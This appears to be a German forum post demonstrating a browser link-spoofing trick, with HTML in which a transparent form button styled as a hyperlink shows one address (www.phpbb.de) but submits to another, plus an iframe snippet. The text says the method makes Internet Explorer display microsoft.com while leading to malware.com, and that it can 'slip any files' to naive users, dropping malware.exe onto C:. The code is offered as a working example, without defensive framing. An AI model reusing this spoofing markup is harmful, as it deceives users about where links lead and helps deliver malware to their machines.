Code: Alles auswählen
<html><head><title>test</title><meta name="author" content="egal"></head><body text="#000000" bgcolor="#FFFFFF" link="#FF0000" alink="#FF0000" vlink="#FF0000">
<A href="http://www.phpbb.de"><FORM action=http://www.burks.de method=get><INPUT style="BORDER-RIGHT: 0pt; BORDER-TOP: 0pt; FONT-SIZE: 10pt; BORDER-LEFT: 0pt; CURSOR: hand; COLOR: blue; BORDER-BOTTOM: 0pt; BACKGROUND-COLOR: transparent; TEXT-DECORATION: underline" type=submit value=http://www.phpbb.de></A></body></html>
Code: Alles auswählen
<table border=2><tr><td rowspan=2><iframe src="http://www.burks.de/test3.html" name="framename" width="400" height="400">irgendein Text</iframe></td></tr></table>
Funktionierendes Beispiel: http://www.burks.de/forum/phpBB2/viewtopic.php?p=15414Ist dieser Code in einem HTML-Dokument eingebettet, so zeigen Internet Explorer und Outlook Express einen Link auf www.microsoft.com an. Bewegt man den Mauszeiger über den Hyperlink, so zeigt auch die Statusleiste www.microsoft.com an, obwohl der Link eigentlich auf www.malware.com/t-bill.html führt.
Mit der Methode kann man jedem IExplorer-DAU beliebige Dateien unterjubeln.
Für pures HTML gilt:
BurksDie harmlose Demo ...führt zunächst auf die Seite www.malware.com, die sofort wieder auf www.microsoft.com umleitet, sodass der Benutzer kaum merkt, dass etwas nicht stimmt. Allein der kurze Aufruf genügt aber, um auf C: die Datei malware.exe zu schreiben.
itst: ich hab mal aus p_ornos phpbb gemacht
